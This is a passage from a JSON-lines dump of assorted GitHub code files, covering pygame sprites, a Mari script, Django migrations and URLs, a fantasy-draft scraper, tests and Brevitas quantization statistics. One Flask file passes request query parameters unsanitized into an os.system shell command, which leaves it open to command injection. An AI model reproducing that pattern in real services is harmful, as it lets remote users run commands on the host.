dir):\n if dir == 'x':\n hits = pg.sprite.spritecollide(self, self.game.walls, False)\n if hits:\n if self.vx > 0:\n self.x = hits[0].rect.left - self.rect.width\n if self.vx < 0:\n self.x = hits[0].rect.right\n self.vx = 0\n self.rect.x = self.x\n if dir == 'y':\n hits = pg.sprite.spritecollide(self, self.game.walls, False)\n if hits:\n if self.vy > 0:\n self.y = hits[0].rect.top - self.rect.height\n if self.vy < 0:\n self.y = hits[0].rect.bottom\n self.vy = 0\n self.rect.y = self.y\n\n def update(self):\n self.get_keys()\n self.x += self.vx * self.game.dt\n self.y += self.vy * self.game.dt\n self.rect.x = self.x\n self.collide_with_walls('x')\n self.rect.y = self.y\n self.collide_with_walls('y')\n\nclass Wall(pg.sprite.Sprite):\n def __init__(self, game, x, y):\n self.groups = game.all_sprites, game.walls\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.image = pg.Surface((TILESIZE, TILESIZE))\n self.image.fill(Color.Green)\n self.rect = self.image.get_rect()\n self.x = x\n self.y = y\n self.rect.x = x * TILESIZE\n self.rect.y = y * TILESIZE\n\n\nclass Obstacle(pg.sprite.Sprite):\n def __init__(self, game, x, y, w, h):\n self.groups = game.walls\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.rect = pg.Rect(x, y, w, h)\n self.x = x\n self.y = y\n self.rect.x = x\n self.rect.y = y\n\n\nclass Portals(pg.sprite.Sprite):\n def __init__(self, game, x, y, w, h, properties):\n self.groups = game.portals\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.properties = properties\n self.rect = pg.Rect(x, y, w, h)\n self.x = x\n self.y = y\n self.rect.x = x\n self.rect.y = y\n\n\nclass Door(pg.sprite.Sprite):\n def __init__(self, game, x, y, w, h):\n self.groups = game.door\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.rect = pg.Rect(x, y, w, h)\n self.x = 248\n self.y = 148\n self.rect.x = x\n self.rect.y = y\n\n","repo_name":"Syliel/TileBasedRPG","sub_path":"sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":4401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"38487691944","text":"icon_path = mari.resources.path('ICONS')\n\ndef selectionMask(invert):\n\tcurrentObj = mari.geo.current()\n\tcurrentChan = currentObj.currentChannel()\n\tcurrentLayer = currentChan.currentLayer()\n\tselectedPatches = currentObj.selectedPatches()\n\t\n\tnewMaskImageSet = currentLayer.makeMask()\n\tmari.history.startMacro('Create custom mask')\n\tfor image in newMaskImageSet.imageList():\n\t\tif invert == False:\n\t\t\timage.fill(mari.Color(0.0, 0.0, 0.0, 1.0))\n\t\telse:\n\t\t\timage.fill(mari.Color(1.0, 1.0, 1.0, 1.0))\n\t\n\tfor patch in selectedPatches:\n\t\tselectedImage = currentObj.patchImage(patch, newMaskImageSet)\n\t\tif invert == False:\n\t\t\tselectedImage.fill(mari.Color(1.0, 1.0, 1.0, 1.0))\n\t\telse:\n\t\t\tselectedImage.fill(mari.Color(0.0, 0.0, 0.0, 1.0))\n\tmari.history.stopMacro()\n\n## Layer mask from selection ACTION\nselectMaskITEM = mari.actions.create('From Selection', 'selectionMask(invert=False)')\nselectMaskITEM.setIconPath('%s/SelectAll.png' % icon_path)\nselectMaskInvertITEM = mari.actions.create('From Selection(Invert)', 'selectionMask(invert=True)')\nselectMaskInvertITEM.setIconPath('%s/SelectInvert.png' % icon_path)\n\nmari.menus.addAction(selectMaskITEM, 'MainWindow/&Layers/Layer Mask/Add Mask')\nmari.menus.addAction(selectMaskInvertITEM, 'MainWindow/&Layers/Layer Mask/Add Mask')","repo_name":"bneall/bnMariTools","sub_path":"bnMaskFromSelection.py","file_name":"bnMaskFromSelection.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"2"} +{"seq_id":"370566799","text":"import re\n\nwith open('Day21.txt') as file:\n lines = [line.strip() for line in file if line.strip()]\n\ningredients = [] # List of ingredients (includes duplicates for different foods)\nallergens = {} # Key -> allergen, Value -> ingredients that possibly contain allergen\nfor line in lines:\n ingredients_list = re.search('(.*) \\(', line).group(1).split(' ')\n allergens_list = re.search('contains (.*)\\)', line).group(1).split(', ')\n\n for i in ingredients_list:\n ingredients.append(i)\n\n for a in allergens_list:\n if a not in allergens:\n allergens[a] = ingredients_list\n else:\n allergens[a] = [existing_a for existing_a in allergens[a] if existing_a in ingredients_list]\n\n# Remove ingredients that could contain allergens\nfor ilist in allergens.values():\n for i in ilist:\n ingredients = list(filter((i).__ne__, ingredients))\nprint(len(ingredients)) #p1\n\n# Determine mapping between allergens and ingredients\ntaken_allergens = set()\nwhile any(len(ilist) != 1 for ilist in allergens.values()):\n for a, ilist in allergens.items():\n if len(ilist) == 1:\n taken_allergens.add(ilist[0])\n else:\n for ta in taken_allergens:\n allergens[a] = list(filter((ta).__ne__, allergens[a]))\n\n# Determine canonical dangerous ingredients list\ncdil = ''\nfor a in sorted(allergens):\n if cdil:\n cdil = cdil + ',' + allergens[a][0]\n else:\n cdil = allergens[a][0]\nprint(cdil)","repo_name":"joshlevin91/Advent","sub_path":"2020/Day21.py","file_name":"Day21.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"6884506529","text":"import configparser\n\nfrom mypythia.extractor.tools import (\n preprocess_message,\n process_candle,\n process_message,\n upload_candle,\n)\nfrom mypythia.processors.pulsar_processor import PulsarProcessor\n\nCONFIG = configparser.ConfigParser()\nCONFIG.read(\"config.ini\")\n\n\nwith PulsarProcessor() as pulsar:\n consumer = pulsar.subscribe(\n CONFIG[\"topics\"][\"TopicRequest\"], name=\"my_pythia_extractor\"\n )\n\n while True:\n msg = consumer.receive()\n try:\n preprocessed_msg = preprocess_message(msg)\n candles = process_message(preprocessed_msg)\n candles = [process_candle(preprocessed_msg[\"ticker\"], c) for c in candles]\n for c in candles:\n upload_candle(c)\n consumer.acknowledge(msg)\n except Exception:\n consumer.negative_acknowledge(msg)\n","repo_name":"wol4aravio/my-pythia","sub_path":"mypythia/extractor/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"71267922286","text":"import os\nfrom flask import Flask, request\n\napp = Flask(__name__)\n\n@app.route(\"/start\")\ndef start():\n shape = request.args.get('shape') # this should be a number\n pitch = request.args.get('pitch') # this should also be a number\n # split this into process as per plans\n os.system(f'./utils/send-text.sh \"{pitch},{shape}\"')\n\n@app.route(\"/stop\")\ndef stop():\n os.system(f'./utils/send-text.sh \"stop\"')\n","repo_name":"chrisruenes1/Collisions-I","sub_path":"provisioning/tone_generator/tone_generator_server.py","file_name":"tone_generator_server.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"37401954151","text":"import networkx as nx\nimport numpy as np\n\nfrom fundl.datasets import make_graph_counting_dataset\nfrom fundl.utils import l2_normalize, pad_graph\n\n\ndef test_pad_graph():\n G = make_graph_counting_dataset(1)[0]\n\n to_size = 15\n\n F = np.vstack([d[\"features\"] for n, d in G.nodes(data=True)])\n A = np.asarray(nx.adjacency_matrix(G).todense())\n\n F, A = pad_graph(F, A, to_size=15)\n assert len(F) == len(A)\n assert len(F) == 15\n\n\ndef test_l2_normalize():\n x = np.array([[3, -3, 5, 4], [4, 5, 3, -3]])\n\n expected = np.array(\n [\n [3 / 5, -3 / np.sqrt(34), 5 / np.sqrt(34), 4 / 5],\n [4 / 5, 5 / np.sqrt(34), 3 / np.sqrt(34), -3 / 5],\n ],\n dtype=np.float32,\n )\n\n assert np.allclose(l2_normalize(x, axis=0), expected)\n","repo_name":"ericmjl/fundl","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"2"} +{"seq_id":"24591668253","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.contrib.gis.db.models.fields\nimport django.utils.timezone\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('auth', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='User',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('password', models.CharField(max_length=128, verbose_name='password')),\n ('last_login', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last login')),\n ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),\n ('email', models.EmailField(unique=True, max_length=75)),\n ('mobileno', models.CharField(max_length=32, blank=True)),\n ('firstname', models.CharField(max_length=64, blank=True)),\n ('lastname', models.CharField(max_length=64, blank=True)),\n ('changed', models.DateTimeField(null=True, editable=False)),\n ('created', models.DateTimeField(null=True, editable=False)),\n ('isactive', models.BooleanField(default=True, help_text=b'Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name=b'active')),\n ('groups', models.ManyToManyField(related_query_name='user', related_name='user_set', to='auth.Group', blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of his/her group.', verbose_name='groups')),\n ('user_permissions', models.ManyToManyField(related_query_name='user', related_name='user_set', to='auth.Permission', blank=True, help_text='Specific permissions for this user.', verbose_name='user permissions')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Location',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('point', django.contrib.gis.db.models.fields.PointField(srid=4326)),\n ('radius', models.IntegerField(default=10, help_text=b'in metres')),\n ('text', models.TextField()),\n ('clue', models.TextField(blank=True)),\n ('payload', models.TextField(blank=True)),\n ('extra', models.TextField(blank=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='TreasureHunt',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=255)),\n ('description', models.TextField()),\n ('place', models.CharField(max_length=255)),\n ('starttime', models.DateTimeField(null=True, blank=True)),\n ('issequential', models.BooleanField(default=False)),\n ('isphysical', models.BooleanField(default=False)),\n ('admin', models.ForeignKey(related_name='ownhunts', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='UserLocation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('timestamp', models.DateTimeField()),\n ('isconfirmed', models.BooleanField(default=False)),\n ('location', models.ForeignKey(to='hunts.Location')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='UserTreasureHunt',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('timestamp', models.DateTimeField()),\n ('treasurehunt', models.ForeignKey(to='hunts.TreasureHunt')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='treasurehunt',\n name='users',\n field=models.ManyToManyField(to=settings.AUTH_USER_MODEL, through='hunts.UserTreasureHunt'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='location',\n name='treasurehunt',\n field=models.ForeignKey(blank=True, to='hunts.TreasureHunt', null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='location',\n name='users',\n field=models.ManyToManyField(to=settings.AUTH_USER_MODEL, through='hunts.UserLocation'),\n preserve_default=True,\n ),\n ]\n","repo_name":"withcamp/bittreasure","sub_path":"hunts/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":5485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"17947443575","text":"import requests\r\nimport json\r\nimport pandas as pd\r\n\r\nleague_id = 688639493300912128\r\nusers_in_league = f'https://api.sleeper.app/v1/league/{league_id}/users'\r\n\r\nusers_response = requests.get(users_in_league)\r\nusers_response = json.loads(users_response.text)\r\nusers_response = pd.DataFrame(users_response)\r\n\r\ndf_users = users_response\r\ndf_drafts = pd.DataFrame()\r\ndf_picks = pd.DataFrame()\r\n\r\nfor user_id in users_response['user_id']:\r\n draft_by_user = f'https://api.sleeper.app/v1/user/{user_id}/drafts/nfl/2021'\r\n drafts_response = requests.get(draft_by_user)\r\n drafts_response = json.loads(drafts_response.text)\r\n drafts_response = pd.DataFrame(drafts_response)\r\n drafts_response['user_id'] = user_id\r\n df_drafts = pd.concat([df_drafts, drafts_response], axis=0)\r\n \r\n \r\ndf_drafts['teams'] = df_drafts['settings'].apply(lambda x: x['teams'])\r\ndf_drafts['format'] = df_drafts['metadata'].apply(lambda x: x['scoring_type'])\r\ndf_drafts = df_drafts[['user_id', 'draft_id', 'teams', 'format']]\r\n \r\nfor i in enumerate(df_drafts.index):\r\n draft_id = df_drafts['draft_id'].iloc[i[0]]\r\n user_id = df_drafts['user_id'].iloc[i[0]]\r\n draft_picks = f'https://api.sleeper.app/v1/draft/{draft_id}/picks'\r\n drafts_picks_response = requests.get(draft_picks)\r\n drafts_picks_response = json.loads(drafts_picks_response.text)\r\n drafts_picks_response = pd.DataFrame(drafts_picks_response)\r\n drafts_picks_response['draft_id'] = draft_id\r\n drafts_picks_response['user_id'] = user_id\r\n df_picks = pd.concat([df_picks, drafts_picks_response], axis=0)\r\n\r\n\r\n\r\ndf_picks = df_picks[df_picks['user_id'] == df_picks['picked_by']]\r\ndf_picks = df_picks[['draft_id', 'round', 'player_id', 'pick_no', 'user_id']]\r\ndf_picks = pd.merge(df_picks, df_drafts[['draft_id', 'teams', 'format']], how='left', on='draft_id')\r\ndf_picks = pd.merge(df_picks, df_users[['user_id', 'display_name']], how='left', on='user_id')\r\n\r\nsleeper = pd.DataFrame(json.loads(requests.get('https://api.sleeper.app/v1/players/nfl').text))\r\nsleeper = sleeper.transpose()\r\n\r\ndf_picks = pd.merge(df_picks, sleeper[['full_name', 'player_id', 'position']], how='left', on='player_id')\r\ndf_picks.to_excel('league_picks.xlsx', index=False)\r\n","repo_name":"fourshadowz/draft_aid","sub_path":"draft-aid/league_picks.py","file_name":"league_picks.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"70400865328","text":"import time\n\n## write your code as always...\nclass MyClass:\n\n def shortComputation(self):\n return 1 + 1\n\n def longComputation(self):\n time.sleep(3)\n return 6 * 7\n\n### Module testing ###\nimport testing\n\nclass Test(testing.AutoTest):\n \"\"\"Example Test\"\"\"\n\n TAGS = [ testing.LONG ]\n\n def test_longComputation( self ):\n \"\"\"example.longComputation test\"\"\"\n\n self.m = MyClass()\n self.result = self.m.longComputation()\n\n if self.local: ## only if the module is executed directly\n print('long computation result: %r' % self.result) \n\n self.assertEqual( self.result, 42, 'unexpected result' )\n\n\n def test_shortComputation(self):\n \"\"\"example.shortComputation test\"\"\"\n\n self.m = MyClass()\n self.result_short = self.m.shortComputation()\n\n if self.local: ## only if the module is executed directly\n print('short computation result: %r' % self.result_short) \n\n self.assertEqual( self.result_short, 2, 'unexpected result' )\n \n \nif __name__ == '__main__':\n\n ## run Test and push self.* fields into global namespace\n testing.localTest( )\n\n ## works thanks to some namespace magic in localTest\n print('The last result of the last test was\\n %r' % result) \n","repo_name":"graik/autotesting","sub_path":"examplepackage/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"21350099891","text":"from django.conf.urls import url\nfrom django.contrib import admin\n\nfrom .views import (\n TaskListAPIView,\n TaskCreateApiView,\n TaskDetailAPIView\n )\n\nurlpatterns = [\n url(r'^task-list/$', TaskListAPIView.as_view(), name='task-list-api'),\n url(r'^task-create/$', TaskCreateApiView.as_view(), name='task-create-api'),\n url(r'^task-detail/(?P\\d+)/$',TaskDetailAPIView.as_view(),name='task-detail-api',\n),\n]\n","repo_name":"maxysilaen/88","sub_path":"TODO/tasks/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"71701189167","text":"import os\nimport util.util as util\nfrom util.evaluation import show_soundfields\n\ndef evaluate_general_ssim_nmse(config_path:str):\n \"\"\"\n Runs the evaluation of prediction performance through Structural\n Similarity (SSIM) and Normalized Mean Squared Error (NMSE) and saves\n inside ssion file a plot showing the results\n\n \"\"\"\n config = util.load_config(config_path)\n print('Loaded configuration from: %s' % config_path)\n session_dir = config_path[:config_path.rfind('/')+1]\n evaluation_path = os.path.join(session_dir, 'simulated_data_evaluation', 'min_mics_' + str(config['evaluation']['min_mics']) +\n '_max_mics_' + str(config['evaluation']['max_mics']) + '_step_mics_' +\n str(config['evaluation']['step_mics'])).replace(\"\\\\\",\"/\")\n\n if not os.path.exists(evaluation_path): os.mkdir(evaluation_path)\n\n util.analyze_and_plot_simulated_results(evaluation_path,config,dB=True)\n \ndef compare_soundfields(config_path):\n \"\"\"\n Plot side-by-side the ground-truth and predicted soundfields,\n for the frequencies set on \"config.json\"\n \"\"\"\n config = util.load_config(config_path)\n print('Loaded configuration from: %s' % config_path)\n\n session_dir = config_path[:config_path.rfind(\"/\")+1]\n visualization_path = os.path.join(session_dir,\"visualization/\")\n show_soundfields(soundfield_path=visualization_path, \n freq_shown = config[\"evaluation\"][\"frequencies\"])\n\n","repo_name":"aogdrummond/deep_learning_module","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"35690274779","text":"from . models import Question\nfrom django.utils import timezone\n\ndef update_poll_status():\n # find polls that created 12 hour ago and set them completed status to True\n\n # test for less time\n twelve_hour_ago = timezone.now() - timezone.timedelta(hours=12)\n completed_questions = Question.objects.filter(\n pub_date__lte=twelve_hour_ago\n )\n if completed_questions:\n for question in completed_questions:\n question.completed = True\n question.save()\n else:\n return True\n","repo_name":"berekashvili22/DjangoPolls","sub_path":"PollsProject/api/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"34122827833","text":"import math\nfrom typing import Optional, Tuple\n\nimport torch\nfrom torch import Tensor\nfrom torch.nn import Parameter\n\nimport brevitas\nfrom brevitas import config\nfrom brevitas.core.utils import StatelessBuffer\nfrom brevitas.function.ops import max_int\n\nfrom .stats_wrapper import SCALAR_SHAPE\n\nDEFAULT_STD_DEV_EPSILON = 1e-8\n\n\nclass NegativeMinOrZero(brevitas.jit.ScriptModule):\n __constants__ = ['stats_reduce_dim']\n\n def __init__(self, stats_reduce_dim: Optional[int] = None) -> None:\n super(NegativeMinOrZero, self).__init__()\n self.stats_reduce_dim = stats_reduce_dim\n self.zero = StatelessBuffer(torch.tensor(0.0))\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor) -> Tensor:\n if self.stats_reduce_dim is None:\n min_val = torch.min(x)\n else:\n min_val = torch.min(x, dim=self.stats_reduce_dim)[0]\n min_val = torch.where(\n min_val <= self.zero().to(min_val.dtype), min_val, self.zero().to(min_val.dtype))\n return min_val\n\n\nclass AbsPercentile(brevitas.jit.ScriptModule):\n __constants__ = ['q', 'stats_reduce_dim']\n\n def __init__(\n self, high_percentile_q: float, stats_reduce_dim: Optional[int], percentile_q=None):\n super(AbsPercentile, self).__init__()\n if percentile_q is not None:\n raise RuntimeError(\"percentile_q is deprecated, please pass high_percentile_q.\")\n assert high_percentile_q <= 100, \"q has to be a percentage\"\n self.q = high_percentile_q\n self.stats_reduce_dim = stats_reduce_dim\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor):\n if self.stats_reduce_dim is None:\n # k is 1-indexed, so round away from zero\n k = int(math.floor(.01 * self.q * x.numel() + 0.5))\n result = x.abs().view(-1).kthvalue(k).values\n else:\n # assuming x is two dimensional, get the other dimension\n assert len(x.size()) == 2, \"Only 2-dim input is supported.\"\n other_dim = abs(self.stats_reduce_dim - 1)\n dim_slice = torch.narrow(x, dim=other_dim, start=0, length=1)\n # k is 1-indexed, so round away from zero\n k = int(math.floor(.01 * self.q * dim_slice.numel() + 0.5))\n result = x.abs().kthvalue(k, dim=self.stats_reduce_dim).values\n return result\n\n\nclass NegativePercentileOrZero(brevitas.jit.ScriptModule):\n __constants__ = ['stats_reduce_dim', 'q']\n\n def __init__(self, low_percentile_q, stats_reduce_dim: Optional[int] = None) -> None:\n super(NegativePercentileOrZero, self).__init__()\n self.stats_reduce_dim = stats_reduce_dim\n self.q = low_percentile_q\n self.zero = StatelessBuffer(torch.tensor(0.0))\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor) -> Tensor:\n if self.stats_reduce_dim is None:\n # k is 1-indexed, so round away from zero\n k = int(math.ceil(.01 * self.q * x.numel()))\n result = x.view(-1).kthvalue(k).values\n else:\n # assuming x is two dimensional, get the other dimension\n assert len(x.size()) == 2, \"Only 2-dim input is supported.\"\n other_dim = abs(self.stats_reduce_dim - 1)\n dim_slice = torch.narrow(x, dim=other_dim, start=0, length=1)\n # k is 1-indexed, so round away from zero\n k = int(math.ceil(.01 * self.q * dim_slice.numel()))\n result = x.kthvalue(k, dim=self.stats_reduce_dim).values\n result = torch.where(\n result <= self.zero().to(result.dtype), result, self.zero().to(result.dtype))\n return result\n\n\nclass PercentileInterval(brevitas.jit.ScriptModule):\n __constants__ = ['stats_reduce_dim', 'low_q', 'high_q']\n\n def __init__(\n self,\n low_percentile_q,\n high_percentile_q,\n stats_reduce_dim: Optional[int] = None) -> None:\n super(PercentileInterval, self).__init__()\n self.stats_reduce_dim = stats_reduce_dim\n self.low_q = low_percentile_q\n self.high_q = high_percentile_q\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor) -> Tensor:\n if self.stats_reduce_dim is None:\n low_k = int(math.ceil(.01 * self.low_q * x.numel()))\n # k is 1-indexed, so round away from zero\n high_k = int(math.floor(.01 * self.high_q * x.numel() + 0.5))\n low_result = x.view(-1).kthvalue(low_k).values\n high_result = x.view(-1).kthvalue(high_k).values\n else:\n # assuming x is two dimensional, get the other dimension\n assert len(x.size()) == 2, \"Only 2-dim input is supported.\"\n other_dim = abs(self.stats_reduce_dim - 1)\n dim_slice = torch.narrow(x, dim=other_dim, start=0, length=1)\n low_k = int(math.ceil(.01 * self.low_q * dim_slice.numel()))\n # k is 1-indexed, so round away from zero\n high_k = int(math.floor(.01 * self.high_q * dim_slice.numel() + 0.5))\n low_result = x.kthvalue(low_k, dim=self.stats_reduce_dim).values\n high_result = x.kthvalue(high_k, dim=self.stats_reduce_dim).values\n interval = high_result - low_result\n abs_interval = torch.abs(interval)\n return abs_interval\n\n\nclass AbsMax(brevitas.jit.ScriptModule):\n __constants__ = ['stats_reduce_dim']\n\n def __init__(self, stats_reduce_dim: Optional[int] = None) -> None:\n super(AbsMax, self).__init__()\n self.stats_reduce_dim = stats_reduce_dim\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor):\n if self.stats_reduce_dim is None:\n return torch.max(torch.abs(x))\n else:\n return torch.max(torch.abs(x), dim=self.stats_reduce_dim)[0]\n\n\nclass AbsMinMax(brevitas.jit.ScriptModule):\n __constants__ = ['stats_reduce_dim']\n\n def __init__(self, stats_reduce_dim: Optional[int] = None) -> None:\n super(AbsMinMax, self).__init__()\n self.stats_reduce_dim = stats_reduce_dim\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor):\n if self.stats_reduce_dim is None:\n return torch.abs(torch.max(x) - torch.min(x))\n else:\n max_val = torch.max(x, dim=self.stats_reduce_dim)[0]\n min_val = torch.min(x, dim=self.stats_reduce_dim)[0]\n return torch.abs(max_val - min_val)\n\n\nclass AbsMaxAve(brevitas.jit.ScriptModule):\n __constants__ = ['stats_reduce_dim']\n\n def __init__(self, stats_reduce_dim: int) -> None:\n super(AbsMaxAve, self).__init__()\n self.stats_reduce_dim = stats_reduce_dim\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor):\n return torch.mean(torch.max(torch.abs(x), dim=self.stats_reduce_dim)[0])\n\n\nclass AbsMaxL2(brevitas.jit.ScriptModule):\n __constants__ = ['stats_reduce_dim']\n\n def __init__(self, stats_reduce_dim: int) -> None:\n super(AbsMaxL2, self).__init__()\n self.stats_reduce_dim = stats_reduce_dim\n\n @brevitas.jit.script_method\n def forward(self, x: torch.Tensor):\n per_channel_max = torch.max(torch.abs(x), dim=self.stats_reduce_dim)[0]\n out = torch.norm(per_channel_max, p=2)\n out = out / math.sqrt(per_channel_max.view(-1).shape[0])\n return out\n\n\nclass AbsAve(brevitas.jit.ScriptModule):\n __constants__ = ['stats_reduce_dim']\n\n def __init__(self, stats_reduce_dim: Optional[int] = None) -> None:\n super(AbsAve, self).__init__()\n self.stats_reduce_dim = stats_reduce_dim\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor):\n if self.stats_reduce_dim is None:\n return torch.mean(torch.abs(x))\n else:\n return torch.mean(torch.abs(x), dim=self.stats_reduce_dim)\n\n\nclass MeanSigmaStd(brevitas.jit.ScriptModule):\n\n def __init__(\n self,\n sigma: float,\n stats_reduce_dim: Optional[int] = None,\n std_dev_epsilon: float = DEFAULT_STD_DEV_EPSILON) -> None:\n super(MeanSigmaStd, self).__init__()\n self.impl = _MeanSigmaStdImpl(stats_reduce_dim, std_dev_epsilon)\n self.sigma = StatelessBuffer(torch.tensor(sigma))\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor):\n sigma = self.sigma()\n out = self.impl(x, sigma)\n return out\n\n\nclass _MeanSigmaStdImpl(brevitas.jit.ScriptModule):\n __constants__ = ['stats_reduce_dim', 'output_shape', 'epsilon']\n\n def __init__(\n self,\n stats_reduce_dim: Optional[int] = None,\n std_dev_epsilon: float = DEFAULT_STD_DEV_EPSILON) -> None:\n super(_MeanSigmaStdImpl, self).__init__()\n self.stats_reduce_dim = stats_reduce_dim\n self.epsilon = std_dev_epsilon\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor, sigma: Tensor):\n abs_val = torch.abs(x)\n if self.stats_reduce_dim is None:\n mean_val = torch.mean(abs_val)\n std_val = torch.sqrt(torch.var(abs_val) + self.epsilon)\n else:\n mean_val = torch.mean(torch.abs(x), dim=self.stats_reduce_dim)\n std_val = torch.sqrt(torch.var(abs_val, dim=self.stats_reduce_dim) + self.epsilon)\n mean_val = mean_val.view(-1)\n std_val = std_val.view(-1)\n return mean_val + sigma * std_val\n\n\nclass MeanLearnedSigmaStd(brevitas.jit.ScriptModule):\n\n def __init__(\n self,\n sigma: float,\n stats_output_shape: Tuple[int, ...],\n stats_reduce_dim: Optional[int] = None,\n std_dev_epsilon: float = DEFAULT_STD_DEV_EPSILON) -> None:\n super(MeanLearnedSigmaStd, self).__init__()\n self.impl = _MeanSigmaStdImpl(stats_reduce_dim, std_dev_epsilon)\n if stats_output_shape == SCALAR_SHAPE:\n self.value = Parameter(torch.tensor(sigma))\n else:\n self.value = Parameter(torch.full(stats_output_shape, sigma))\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor):\n sigma = self.sigma.view(self.sigma.shape) # trick to get a tensor type\n out = self.impl(x, sigma)\n return out\n\n def _load_from_state_dict(\n self, state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys,\n error_msgs):\n value_key = prefix + 'sigma'\n retrocomp_value_key = prefix + 'learned_sigma'\n if retrocomp_value_key in state_dict: # retrocompatibility\n state_dict[value_key] = state_dict.pop(retrocomp_value_key)\n super(MeanLearnedSigmaStd, self)._load_from_state_dict(\n state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys, error_msgs)\n sigma_key = prefix + 'sigma'\n if config.IGNORE_MISSING_KEYS and sigma_key in missing_keys:\n missing_keys.remove(sigma_key)\n\n\nclass KLMinimizerThreshold(torch.nn.Module):\n \"\"\"\n Based on:\n https://github.com/apache/incubator-mxnet/blob/master/python/mxnet/contrib/quantization.py\n \"\"\"\n\n def __init__(self, signed, bit_width_impl, num_bins=1000 + 1, smoothing_eps=0.0001):\n super(KLMinimizerThreshold, self).__init__()\n self.num_bins = num_bins\n self.smoothing_eps = smoothing_eps\n self.signed = signed\n self.bit_width_impl = bit_width_impl\n self.absmax_impl = AbsMax()\n\n def smooth_normalize_distribution(self, p, eps):\n is_zeros = (p == 0).float()\n n_zeros = is_zeros.sum()\n n_nonzeros = torch.numel(p) - n_zeros\n if not n_nonzeros:\n return None\n eps1 = eps * n_zeros / n_nonzeros\n hist = p.float()\n hist += eps * is_zeros + (-eps1) * n_nonzeros\n dist = torch.distributions.categorical.Categorical(logits=hist)\n return dist\n\n def forward(self, x: Tensor):\n absmax = self.absmax_impl(x)\n bit_width = self.bit_width_impl()\n num_quantized_bins = max_int(self.signed, False, bit_width).int()\n thresholds = torch.zeros(self.num_bins // 2 + 1 - num_quantized_bins // 2, device=x.device)\n divergence = torch.zeros_like(thresholds)\n quantized_bins = torch.zeros(num_quantized_bins, device=x.device)\n hist = torch.histc(x, bins=self.num_bins, min=-absmax, max=absmax).int()\n hist_edges = torch.linspace(-absmax, absmax, self.num_bins + 1)\n for i in 